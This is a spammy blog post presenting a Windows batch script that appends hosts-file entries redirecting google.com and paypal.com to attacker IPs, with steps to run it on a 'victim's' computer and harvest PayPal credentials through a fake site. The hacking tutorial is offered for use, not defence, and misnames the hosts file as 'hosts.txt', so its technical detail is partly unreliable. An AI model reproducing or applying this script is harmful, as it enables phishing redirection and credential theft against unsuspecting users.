Tech News Today, Marshmallow Custom Rom, Huawei, Run Programs, Network, Chromebook, Bank Account

Sabtu, 18 Juni 2016

DNS POISONING USING BATCH FILE PART-1

DNS POISONING USING BATCH FILE PART-1 - To all visitors of this blog, I say welcome and thank you for visiting the blog Tech News Today Look for all the things you need that are available on this blog. If not available, please leave suggestions and comments for the development of this blog. now we will discuss first about DNS POISONING USING BATCH FILE PART-1 we have collected a lot of information from sources to create this article, so please see.

Articles : DNS POISONING USING BATCH FILE PART-1
full Link : DNS POISONING USING BATCH FILE PART-1
Article Batch File Viruses,

You can also see our article on:


DNS POISONING USING BATCH FILE PART-1

Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted scraps from your computer and even for creating a batch VIRUS.

DNS Poisoning:


The batch file can have the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steals credentials.



1. Just open up a notepad, copy and paste the below code

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the Victims computer to infect it.

4.This program creates a new entry in the hosts file, so that whenever a user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the PayPal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.



information DNS POISONING USING BATCH FILE PART-1 has been completed in the discussion.

hopefully the article we give the title DNS POISONING USING BATCH FILE PART-1 can provide knowledge for you in living everyday life in determining the gadget that suits your needs.

you just read the article about DNS POISONING USING BATCH FILE PART-1 if this article is useful for you and want to bookmark it or share it please use the link https://sihanandi.blogspot.com/2016/06/dns-poisoning-using-batch-file-part-1.html thank you and do not forget to comment if anyone.

Tag : ,
Share on Facebook
Share on Twitter
Share on Google+

Related : DNS POISONING USING BATCH FILE PART-1

0 komentar:

Posting Komentar